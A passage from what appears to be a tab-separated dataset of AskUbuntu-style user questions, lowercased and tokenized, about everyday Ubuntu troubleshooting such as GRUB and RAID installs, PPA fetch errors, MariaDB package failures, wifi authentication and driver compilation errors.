disk identifier : 0x6c9ef990 and $ cat /etc/fstab shows # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sdb2 during installation uuid=d18d8971-e86c-4c2c-8396-27e175e1a9f3 / ext4 errors=remount-ro 0 1 # /home was on /dev/sdc1 during installation uuid=91934cf2-27b3-4db7-9f24-0ce5bb9d0d6c /home ext4 defaults 0 2 # swap was on /dev/sdb1 during installation uuid=c3e7afb4-7fd8-4d1d-b270-c4097493dfa4 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 # /dev/mapper/cryptswap1 none swap sw 0 0 # the external usb backup drive uuid= '' 3b8e6317-6d88-4e18-a2ac-99129ce00414 '' /mnt/ext_hd_1tb ext4 defaults 0 2 # /dev/mapper/cryptswap1 none swap sw 0 0 # /dev/mapper/cryptswap1 none swap sw 0 0 and $ sudo blkid -o full -s uuid shows /dev/sdc1 : uuid= '' 91934cf2-27b3-4db7-9f24-0ce5bb9d0d6c '' /dev/sdb1 : uuid= '' f0eea40e-af3f-4eee-9b82-9c17a557e2ef '' /dev/sdb2 : uuid= '' d18d8971-e86c-4c2c-8396-27e175e1a9f3 '' /dev/sda1 : uuid= '' 3b8e6317-6d88-4e18-a2ac-99129ce00414 '' short of just accepting a suboptimal system i do n't know what to do .
505881	is google transliteration input method on ubuntu ( for marathi ) available ?	is google transliteration input method on ubuntu ( for marathi ) available ? will it work after downloading & installing 'wine ' for ubuntu ?
505891	issues with the marlin-devs repository	i 'm trying to install marlin file manager on ubuntu 14.04 . i add the repository add-apt-repository ppa : marlin-devs/marlin-daily then when i 'apt-get update ' i get this little gem : w : failed to fetch http : //ppa.launchpad.net/marlin-devs/marlin-daily/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/marlin-devs/marlin-daily/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . and after that i ca n't find the marlin package to install it : apt-get install marlin reading package lists ... done building dependency tree reading state information ... done e : unable to locate package marlin it would also seem that after that apt-get updates i ca n't get autocomplete for any package in the terminal , say if i type : apt-get install gimp [ tab ] i do n't get a list of the available packages . the last issue goes away after i remove the repository , but i ca n't quite put my finger on why this is happening and how i could get marlin on this machine . i 've been looking around for a tarball but all roads seem to take me to the repository . any input would be awesome .
505893	fixing ftbfs packages	i 'm trying to 'cmake ' for a program , but i get errors . on the web i found that my problems can be to solve by the patch : https : //github.com/mati75/kadu/commit/05afae19d4ff347f498aac8a4d8aff7c42b4e6cc how to use it ?
505895	i want to install an older version of firefox in ubuntu 14.04	i have installed ubuntu 14.04 , which already has firefox v31 . i want to install an older version of firefox . how can i do it .
505897	installing ubuntu 14.04 on asus zenbook ( raid )	this machine have 2 128 gb ssd drives ( http : //www.amazon.com/dp/b00epghe0e/ref=twister_b00jyfokks ) . i managed to install ubuntu with no problems on one ssd drive , but i am having following troubles with raid setup . here is the details : i boot from live usb ( try ubuntu option ) . install mdadm : sudo apt-get install mdadm . create raid : run installer : it fails to install grub : i report a bug https : //bugs.launchpad.net/ubuntu/+source/grub-installer/+bug/1351621 . i also tried to install grub manually after installer failed : i looked how raid is partinitioned : added bios boot partinition : tried to install grub : $ sudo mount /dev/md127p4 /mnt $ sudo mount /dev/md127p1 /mnt/boot $ sudo grub-install -- root-directory=/mnt /dev/md/127 installing for i386-pc platform . grub-install : error : diskfilter writes are not supported . tried solutions proposed in why this occurs error : diskfilter writes are not supported but still same error .
505898	audacity stop record freeze	as the title reads , after recording audio , and pressing the stop button , audacity freezes . this does n't appear to happen all the time , but when it does i terminate audacity and then recover project upon reopening . help !
505903	when will `` runlevel '' event be emitted ?	start on runlevel [ 2345 ] referring this : the syntax of start on stanza is : start on event [ [ key= ] value ] ... [ and|or ... ] it means , runlevel is en event , [ 2345 ] is that event 's environment variables ' value . my question is when will runlevel event be emitted ? where can i dig more information about runlevel event ?
505905	12.04.5 hwe download - how much data ?	i will be upgrading from 12.04.3 to 12.04.5 hwe . i hope to use a wireless download . i would like to know how much data i can expect to have to download . i have searched for this , but the information does n't seem to be there . thanks .
505906	batttery icon is missing in uninty ubuntu 14.04	could somebody help me with this issue . the battery icon dissapears from the panel . i am using ubuntu 14.04 with unity . how can i rapair it ? thanks ! ! !
505909	what is the difference between the `` start '' and `` start now '' options in transmission ?	in transmission , if you right-click on a paused torrent , you will get a menu . one option is `` start '' and the one below that is `` start now '' . neither of these options have any tooltips associated with them , nor is there any information on the official webpage .
505910	getting linux to downclock and lower the v-core of my cpu at idle	so when i boot into my windows 8 partition , windows automatically downclocks my cpu and lowers it 's v-core so that the idle temps of my i5-4570 cpu go down to 25 c. now on ubuntu on the other hand , my cpu temp stays at 40 c when idle , and the only logical conclusion i have made is that it 's because ubuntu does not lower my cpu like windows does . i have tried doing echo `` ondemand '' | sudo tee /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor and also have tried to replace ondemand with powersaving , but that reduces the temps only to like 38 c which is still not enought . so is there a way to configure ubuntu to automatically do this when idle and then automatically put all my gears to full power when i start up cpu and gpu intensive applications ?
505912	i need to boot windows but it 's on a separate partition	i had windows 7 and the windows 7 booter will not boot windows . the windows boot loader files are there and i want to try getting the linux booter to load the windows boot loader files . please help !
505918	how to mount samsung s5 on ubuntu	how can i mount samsung s5 on ubuntu . file transfer to device is fine , but from device to ubuntu reads error
505919	installing anaconda python on ubuntu	how to install anaconda python on ubuntu ? https : //store.continuum.io/cshop/anaconda/ is there a way to apt-get install it ? i only have command line access to my server , how do i install anaconda python on ubuntu 14.04 ?
505920	using nvidia and compton unable to disable vsync	i am using xubuntu 14.04.1 64bit . the graphics card is a nvidia 745 ( driver versions 340.24 ) , and i am using compton compositor . in the nvidia driver 's settings i unchecked the sync to vsync and i turned off vsync in compton . however vsync is still on here is my compton config file : http : //pastebin.com/raw.php ? i=9hbn8x0b any thoughts or suggestion is helpful , thanks
505921	how to give all the users ( except guest ) permissions to particular directory via terminal ?	i want every user to have full permissions over a single directory ( and all the contents ) . is this possible , and how ? thanks .
505922	switching back to text console	i have used ubuntu many times but currently ubuntu crashed every time on my system . i dont understand the exact problem of my computer . i have tried every version of ubuntu & also other distro . but got same error every time . here is the link of the screenshot . `` http : //s26.postimg.org/5ye6orptl/10443904_492797057533437_1603374469_n.jpg '' system config : amd phenom ii x2 555 black edition 2gb ddr3 ram gigabyte ga-ma74gmt-s2 please help me . i really want to use ubuntu again .
505924	error message `` failed to fetch fetching the upgrade failed . there may be a network problem '' when upgrading ubuntu 12.04 to ubuntu 12.10 !	ok . i really want ubuntu 12.10 but there is one problem . whenever i try the upgrade , it says the error message failed to fetch fetching the upgrade failed . there may be a network problem what is happening here ? please please please , can anyone help . i spent my whole day looking for an answer but nothing is working . i could reinstall it but i have a lot of files and no drive to backup my data . please help . thank you all in advance
505926	i want to boot directly to my ubuntu os without chosing on grub menu	firstly , i have my vista os , then i wan na use ubuntu only , so i install ubuntu succesfull replace to vista os . after that i ca n't boot to ubuntu but i still see boot windows menu with error . i tried to use boot-repair by usb with live ubuntu and now i am typing this ask by ubuntu . but i had the problem that i have to chose grub menu with windows 7 ( it show windows 7 i/o vista lol ) and ubuntu . so i want to boot to ubuntu not via this grub menu directly . this is my paste.ubuntu.com/7934349/ so pls help me to fix it with as much details as much help for me .
505929	shutdown after a certain time	i am done using my laptop but i am using the hotspot in my smart phone . so i want my laptop to be awake for next one hour . how can i shutdown the laptop after one hour of time ?
505930	linux beowulf cluster ubuntu 14.04	my question takes on several dimensions and i will do my best to focus my question as much as possible . i recently completed building a cluster using nfs and mpich2 with the master and two slave nodes running ubuntu 14.04 . i used a dlink router as a switch for both the cluster and internet connection ( connected to my gateway ) . setup went as follows : gateway- > router/wifi - > ( using lan ports ) dlink router/switch - > master , slavenode1 , slavenode2 . i have an old trendnet usb to ethernet adapter which i would like to utilize and have internet traffic dedicated to that nic while using the built in nic on my machine to manage and connect to the slavenodes . so the new configuration would look something like this : gateway - > router/wifi - > master - > ( using wan ) dlink router/switch - > ( using lan ) slavenode1 , slavenode2 , slavenode3 , slavenode4 . currently , every time i plug in the ethernet feeding the cluster , my ethernet connection to the internet is cut . i am using the trendnet adapter to connect to the internet , and works fine until i plugin the cluster . it consistently defaults the connection to the built in nic . any ideas how to run both connections ? what am i missing ? additionally , does anyone know any firmware i can pickup for the dlink router so i can configure the wan correctly ?
505931	can you record live tv on ubuntu tv	so i 'm thinking of installing ubuntu tv on my tv , but i only want to install it if it can record live tv , like a dvr , and than watch later ... is this possible on ubuntu tv ?
505932	ubuntu 14.04 mtp error	i am trying to make my new phone ( oneplus one ) work with ubuntu 14.04 , dell vostro 2520 . here is the output from /var/log/syslog.. [ 489.186871 ] usb 1-1.1 : usb disconnect , device number 10 [ 498.708981 ] usb 2-1.2 : new high-speed usb device number 4 using ehci-pci [ 498.803568 ] usb 2-1.2 : new usb device found , idvendor=05c6 , idproduct=6764 [ 498.803575 ] usb 2-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 498.803579 ] usb 2-1.2 : product : one [ 498.803582 ] usb 2-1.2 : manufacturer : oneplus [ 498.803585 ] usb 2-1.2 : serialnumber : 482a54b2 mtp-probe : checking bus 2 , device 4 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2 '' mtp-probe : bus : 2 , device : 4 was not an mtp device
505942	sublime text 2 unity launcher opens sublime.desktop	i have looked on various places but can not find any answer to my problem . here it is : i installed sublime text 2 following this tutorial : http : //www.technoreply.com/how-to-install-sublime-text-2-on-ubuntu-12-04-unity/ i replicated all the steps except step 4 that i changed by using this command instead : ~/.local/share/applications/sublime.desktop everything works fine apart from the fact that when i click on the shorcut icon or when i start sublime text with a command line , it does not open a new file but my sublime.desktop file . can somebody help me understand why it does that ? thanks in advance pierre-victor
505943	qt 5 configuration	i have a problem setting qt5 apps correctly on my computer . i 'm running ubuntu 14.04 with kde4 , i have configured the look in the kde system settings and that look is used in every qt4 apps and gtk apps , but not in qt5 apps . the most annoying think is that i use double click to activate item , but in qt5 apps this is ignored and items are activated with single click . does anybody know how can i change the default qt5 setting ? i have tried deleting my .kde folder , moving it to .kde4 , tried different configurations in kde system settings , tried to find qtconfig for qt5 ( which seems not to exist anymore ) and even installed daily build of kf5 and used the kde5 system setting where i set theme , coloring and mouse behaviour and even that was ignored in qt5 apps . i know that qt5 will tried to use the system settings automatically - that is the reason why there is no qtconfig , but it just not working at all . so here i 'm asking for anybody help on this topic or at least some info how to configure qt properly or to say it better : how to configure qt5 at least somehow . also i 'm using the ubuntu 's qt5.2.1 but i also installed qt5.3 from qt website but the behaviour is the same in both version
505945	tar commands returns stdin error	tar -xvfz files.tgz gzip : stdin : not in gzip format tar : child returned status 1 tar : error is not recoverable : exiting now this the error i got . ( this file is created by tar -cvzf file.tgz file ) moreover i can able to extract this same in another ubuntu server . i 'm using aws ec2 server . please someone help
505951	cheap graphics card for my sever	i 'm turning a old xps 420 dell computer into a server ( headless ) for use at home . so far i have everything up running however the radeon hd 3870 graphics card that came with the computer is causing me worry . running the command sensor gives me this . radeon-pci-0100 adapter : pci adapter temp1 : +77.0째c right now the computer is in a very cold environment < 20 degrees c and the graphics card is under 0 load . no graphical environment is running , no monitor is attached . i think its a driver issue if anyone has suggestions i 'd like to try them . i have tried a few things myself but most of what i found online was for people running a gui . i 'm also thinking about replacement with something that is primary very cheap < $ 50 , quiet/silent , and highly compatible with ubuntu . i 'm currently running ubuntu 14.04 . thank you for your help .
505954	dpkg : error processing package mariadb-server-5.5	ok , i think i royally screwed up my laptop . i was trying to replace mysql with mariadb and accidentally installed mariadb v10.1 ( i should 've used mariadb v5.5 ) . i decided i 'd just `` downgrade '' to v5.5 , so i did a bunch of stuff ( i do n't recall exactly what , but there was alot of sudo apt-get ... madness going on ) . fast forward to now .. mysql is n't working .. neither is mariadb v10.1 ( which used to work -- i think i uninstalled it ) . when i come to install mariadb v5.5 using the command sudo apt-get -f install i get the following error : [ ~ ] sudo apt-get -f install [ sudo ] password for rock : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 11 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up mariadb-server-5.5 ( 5.5.38+maria-1~trusty ) ... sudostart : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing package mariadb-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mariadb-server : mariadb-server depends on mariadb-server-5.5 ( = 5.5.38+maria-1~trusty ) ; however : package mariadb-server-5.5 is not configured yet . dpkg : error processing package mariadb-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mariadb-server-5.5 mariadb-server e : sub-process /usr/bin/dpkg returned an error code ( 1 )
505955	ar9485 - kubuntu ( ubuntu 14.04.1 lts ) wireless not connecting anymore	i 'm running kubuntu 14.04.1 lts on a asus pu301la ro039g . wireless and wired connection worked fine until yesterday , when the `` i do n't know what '' happened . symptom is the unability to connect to my home wpa2 password protected wireless network ( asus rt-n14u router wireless n300 ) . network is detected but , clicking to connect , it remains stucked to `` waiting for authorization '' stage , prompting a password request continuously . the other wireless devices just connect fine . the wired connection works fine . i tried to disable kwallet , to remove kwallet and network manager configuration files , without improvement . i tried both network-manager and wicd with same result ( like the password was incorrect ) . i noticed in dmesg some `` country code '' messing up between authentication and deauthentication time . [ 20362.252210 ] cfg80211 : calling crda to update world regulatory domain [ 20362.259767 ] cfg80211 : world regulatory domain updated : [ 20362.259772 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 20362.259776 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 20362.259779 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 20362.259782 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 20362.259785 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 20362.259788 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 20375.072612 ] wlan0 : authenticate with bc : ee:7b : e4:0a:44 [ 20375.096073 ] wlan0 : send auth to bc : ee:7b : e4:0a:44 ( try 1/3 ) [ 20375.097662 ] wlan0 : authenticated [ 20375.099932 ] wlan0 : associate with bc : ee:7b : e4:0a:44 ( try 1/3 ) [ 20375.104054 ] wlan0 : rx assocresp from bc : ee:7b : e4:0a:44 ( capab=0xc11 status=0 aid=2 ) [ 20375.104091 ] wlan0 : associated [ 20375.104141 ] cfg80211 : calling crda for country : de [ 20375.106124 ] ath : eeprom regdomain : 0x8114 [ 20375.106126 ] ath : eeprom indicates we should expect a country code [ 20375.106127 ] ath : doing eeprom country- > regdmn map search [ 20375.106128 ] ath : country maps to regdmn code : 0x37 [ 20375.106130 ] ath : country alpha2 being used : de [ 20375.106130 ] ath : regpair used : 0x37 [ 20375.106132 ] ath : regdomain 0x8114 dynamically updated by country ie [ 20375.106145 ] cfg80211 : regulatory domain changed to country : de [ 20375.106146 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 20375.106147 ] cfg80211 : ( 2400000 khz - 2483500 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 20375.106149 ] cfg80211 : ( 5150000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 20375.106149 ] cfg80211 : ( 5250000 khz - 5350000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 20375.106150 ] cfg80211 : ( 5470000 khz - 5725000 khz @ 40000 khz ) , ( n/a , 2698 mbm ) [ 20375.106151 ] cfg80211 : ( 57240000 khz - 65880000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 20380.582768 ] wlan0 : deauthenticating from bc : ee:7b : e4:0a:44 by local choice ( reason=3 ) the driver in use is : riotste @ riotste-pu301la : ~ $ ls /sys/class/net/wlan0/device/driver/module/drivers/ pci : ath9k platform : ath9k i do n't know what other system information outputs to post , but if someone can help i will grab any further useful informations later . thanks in advance .
505956	install lib32v4l-0 but receiving dependency error	i am trying to install lib32v4l-0_0.6.4-1ubuntu1_amd64.deb but i get the following error : ( reading database ... 406870 files and directories currently installed . ) preparing to unpack lib32v4l-0_0.6.4-1ubuntu1_amd64.deb ... unpacking lib32v4l-0 ( 0.6.4-1ubuntu1 ) over ( 0.6.4-1ubuntu1 ) ... dpkg : dependency problems prevent configuration of lib32v4l-0 : lib32v4l-0 depends on libv4l-0 ( = 0.6.4-1ubuntu1 ) ; however : version of libv4l-0 : amd64 on system is 1.0.1-1. dpkg : error processing package lib32v4l-0 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : lib32v4l-0 then i run sudo apt-get upgrade which gives me : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : lib32v4l-0 : depends : libv4l-0 ( = 0.6.4-1ubuntu1 ) but 1.0.1-1 is installed e : unmet dependencies . try using -f. then i run sudo apt-get upgrade -f : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done calculating upgrade ... done the following packages will be removed : lib32v4l-0 the following packages have been kept back : hostapd 0 upgraded , 0 newly installed , 1 to remove and 1 not upgraded . 1 not fully installed or removed . after this operation , 287 kb disk space will be freed . do you want to continue ? [ y/n ] y ( reading database ... 406869 files and directories currently installed . ) removing lib32v4l-0 ( 0.6.4-1ubuntu1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) ... i 'm trying to install the lib32v4l-0_0.6.4-1ubuntu1_amd64.deb package because i need to install the ia32-libs_2.7ubuntu26.1_amd64.deb package which depends on it . does anyone know a solution ( or even better way ) ? i 'm using ubuntu 14.04lts
505958	nautilus actions configuration tool for unity	i recently saw about the nautilus action configuration tool for a gnome desktop . it will be real fun in creating new actions to the file manager context menus with it . i do wan na have one such thing for my unity deskie . . . is it available for a unity desktop environment ?
505964	i said uefc supported , i did n't say it was chosen . my setting is ( legacy and uefi )	having installed the i386 version successfully as dual boot , would n't you assume the bios settings are correct ? my real problem right now is that if i go to the wd15ears device , grub says the drive is locked and i ca n't remove the partitions to try the install again . the second thing im curious about is why did the 64 bit install cd , not recognize windows 8.1 pro , when the 32 bit version did . third , does a ssd device have to run uefi . i was hoping to install both systems on the ssd for quick start , but install all apps on the wd15ears device . what i noticed is that neither os gives you the option of where to install applications .
505965	what does `` seeding to 3 of 4 connected peers 7kb/s ▲ '' mean ?	this is transmission bittorrent client : what does the `` seeding to 3 of 4 connected peers 7kb/s ▲ '' ? what is seeding and what are peers ? and why does this only appear after it has downloaded ? before it says `` downloading from 60 of 60 peers - 785 kb/s ▼ ''
505966	ca n't use the internet over wifi	my macbook 3,1 can connect to my router , but can not use the connection . i have tried to solve this problem , but not smart enough to do so . that 's why i 'm turning to you . how i am able to connect to the internet : on windows xp through both wifi and ethernet with home router on mac osx 10.5 through both wifi and ethernet with home router on lubuntu 14.04 through ethernet with home router on lubuntu 14.04 through wifi with school router on lubuntu 14.04 through unsecured wifi hanging in the neighbourhood how i am not able to connect to the internet : on lubuntu 14.04 through wifi with home router i am able to connect to the router as shown in the picture below , but somehow i ca n't use the connection . i ca n't even ping to the router itself , while the laptop is showing up in the dhcp list of connections with the correct mac address and the same assigned ip address as you can see in the picture . i am completely lost at to what the problem might be . anybody knows where the problem might lay ? ! after running the script found here as suggested by wild man , i got the following output . see pastebin .
505969	errors installing wireless driver	i have a wireless dongle and i 'm attempting to install their linux drivers . from here : http : //www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wireless_adapters_n150/ew-7811un when i run install.sh ( i only have the cli ) , i get these errors . how can i get this working ? this is a 64bit machine . /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c : in function ârtw_proc_init_oneâ : /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:313:3 : error : implicit declaration of function âcreate_proc_entryâ [ -werror=implicit-function-declaration ] rtw_proc=create_proc_entry ( rtw_proc_name , s_ifdir , init_net.proc_net ) ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:313:11 : warning : assignment makes pointer from integer without a cast [ enabled by default ] rtw_proc=create_proc_entry ( rtw_proc_name , s_ifdir , init_net.proc_net ) ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:320:3 : error : implicit declaration of function âcreate_proc_read_entryâ [ -werror=implicit-function-declaration ] entry = create_proc_read_entry ( `` ver_info '' , s_ifreg | s_irugo , rtw_proc , proc_get_drv_version , dev ) ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:320:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ver_info '' , s_ifreg | s_irugo , rtw_proc , proc_get_drv_version , dev ) ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:326:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` log_level '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:332:8 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_log_level ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:348:21 : warning : assignment makes pointer from integer without a cast [ enabled by default ] padapter- > dir_dev = create_proc_entry ( dev- > name , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:379:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` write_reg '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:385:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_write_reg ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:387:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` read_reg '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:393:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_read_reg ; ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:396:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` fwstate '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:404:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` sec_info '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:412:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mlmext_state '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:420:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` qos_option '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:427:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ht_option '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:434:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_info '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:441:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ap_info '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:448:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` adapter_state '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:455:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` trx_info '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:462:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:469:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:476:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:483:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:490:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:497:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:504:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:511:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/zeno/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:520:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump3 '' , s_ifreg | s_irugo , ^ 